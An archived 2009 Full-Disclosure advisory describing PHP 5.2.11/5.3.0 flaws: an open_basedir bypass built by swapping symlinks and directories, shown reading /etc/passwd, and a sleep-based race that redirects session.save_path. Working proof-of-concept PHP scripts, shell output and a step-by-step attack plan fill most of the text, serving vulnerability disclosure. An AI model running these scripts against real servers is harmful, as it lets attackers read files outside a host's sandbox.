lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 13 Nov 2009 13:50:42 +0100
From: Maksymilian Arciemowicz <cxib@...urityreason.com>
To: full-disclosure@...ts.grok.org.uk
Subject: PHP 5.2.11/5.3.0 Multiple Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ PHP 5.2.11/5.3.0 Multiple Vulnerabilities ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 01.10.2009
- - Pub.: 13.11.2009

Risk: Medium

Affected Software:
- - PHP 5.3.0
- - PHP 5.2.11

Original URL:
http://securityreason.com/achievement_securityalert/70

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers
to write dynamically generated pages quickly.

http://lu2.php.net/manual/en/function.symlink.php

ksymlink ? Creates a symbolic link

bool symlink  ( string $target  , string $link  )

- --- 1. PHP 5.2.11/5.3.0 Multiple Vulnerabilities ---
The first main problem exist in security model based on symlinks
open_basedir. Paths like $target and $link are checked by open_basedir.
We can bypass open_basedir, but function symlink() is not affected.
Issue has been generated by false security model designed by PHP.

example:
127# cat sym.php
<?php
symlink("/etc/passwd", "./symlink");
?>
127# php sym.php
PHP Warning:  symlink(): open_basedir restriction in effect.
File(/etc/passwd) is not within the allowed path(s): (/www) in
/www/test/sym.php on line 2

Warning: symlink(): open_basedir restriction in effect.
File(/etc/passwd) is not within the allowed path(s): (/www) in
/www/test/sym.php on line 2
127#

open_basedir will disallow /etc/passwd.

Let`s see:
127# ls -la
total 8
drwxr-xr-x   2 www  www   512 Oct 20 00:33 .
drwxr-xr-x  13 www  www  1536 Oct 20 00:26 ..
- -rw-r--r--   1 www  www   356 Oct 20 00:32 kakao.php
- -rw-r--r--   1 www  www    45 Oct 20 00:26 sym.php
127# pwd
/www/test
127# cat kakao.php
<?php
mkdir("abc");
chdir("abc");
mkdir("etc");
chdir("etc");
mkdir("passwd");
chdir("..");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
symlink("abc/abc/abc/abc","tmplink");
symlink("tmplink/../../../etc/passwd", "exploit");
unlink("tmplink");
mkdir("tmplink");
?>

127# php kakao.php
127# ls -la
total 12
drwxr-xr-x   4 www   www   512 Oct 20 00:37 .
drwxr-xr-x  13 www   www  1536 Oct 20 00:26 ..
drwxr-xr-x   4 www   www   512 Oct 20 00:37 abc
lrwxr-xr-x   1 www   www    27 Oct 20 00:37 exploit ->
tmplink/../../../etc/passwd
- -rw-r--r--   1 www   www   356 Oct 20 00:32 kakao.php
- -rw-r--r--   1 www   www    45 Oct 20 00:26 sym.php
drwxr-xr-x   2 www   www   512 Oct 20 00:37 tmplink
127# cat exploit
# passwd
#
root:*:0:0:god:/root:/bin/csh
...

now "tmplink" is a directory. so link "exploit" will be
"../../etc/passwd". We don't need bypass open_basedir, it is a design
mistake. PHP will allow "tmplink/../../../etc/passwd" because
./tmplink/../../../etc/passwd realy exists.
So if we want read other file, we need create other structure.

example "/usr/pkg/etc/php.ini":

mkdir("usr");
chdir("usr");
mkdir("pkg");
chdir("pkg");
mkdir("etc");
chdir("etc");
mkdir("php.ini");
chdir("..");
chdir("..");
chdir("..");

PHP will confirm, that tmplink/../../../usr/pkg/etc/php.ini realy exist.
Very important is removing fake link "tmplink" and we need to create in
this same place dir with this same name.

unlink("tmplink");
mkdir("tmplink");

This is the main trick here. Because, "tmplink" (dir) are only -1 deep,
not -4.

Under PHP 5.2.11 we can also bypass safe_mode. However, the security,
such as whether to run suphp php with the privileges of users also have
their drawbacks.

We can use our exploit to show this vulnerability. If httpd allow read
link (default), we can create symlink to / (ofcourse if we have access).
If we can not read symlink, we can use next PHP flaw "hazard syphon" to
read other files.

example of php hazard (session) (open_basedir=/www):

script0 "/www/test/.htaccess":
php_value session.save_path "/www/test/notyetexists"

file /www/test/notyetexists doesn`t exist (current)

script1 "/www/test/sessrun.php"
<?php
sleep(60);
session_start();
?>

now we have 60 sec to run script2

script2 "/www/test/runin60.php":

<?php
mkdir("abc");
chdir("abc");
mkdir("tmp");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
symlink("abc/abc/abc/abc","tmplink");
symlink("tmplink/../../../tmp", "notyetexists");
unlink("tmplink");
mkdir("tmplink");
?>

Hazard exist in PHP!
	
Plan of action:
0. Create .htaccess with 'session.save_path "/www/test/notyetexists"'.
1. Run script1, where first phase (SAPI) will check privileges to
/www/test/notyetexists. But this file or dir, doesn't exists, so
open_basedir will return false.
2. Script1 will generate sleep signal with 60sec delay. In this momemnt,
we need run Scritp2. This script, will create link
/www/test/notyetexists to /tmp or other directories.
3. Script1 after 60sec will run session_start() function, where
privileges to /www/test/notyetexists aren't checked in this moment.

In result, we can use function sleep() to create fake delay and first
issue can help create symlinks.

- --- 2. Exploit ---

open_basedir bypass:
http://securityreason.com/achievement_exploitalert/14

hazard analogy, as in this note

- --- 3. Fix ---
Fix not avaliable

- --- 4. Greets ---
sp3x Infospec Chujwamwdupe p_e_a pi3

- --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib {a.t] securityreason [d00t} com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl

pub   1024D/A6986BD6 2008-08-22
uid                  Maksymilian Arciemowicz (cxib)
<cxib@...urityreason.com>
sub   4096g/0889FA9A 2008-08-22


-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAkr9ViIACgkQpiCeOKaYa9Y88ACeOmxwxPu3WzG/wQL0UbIqeU+e
uwQAoLcydtM7mJxznuTa9JX71PRzGmd6
=r3bP
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ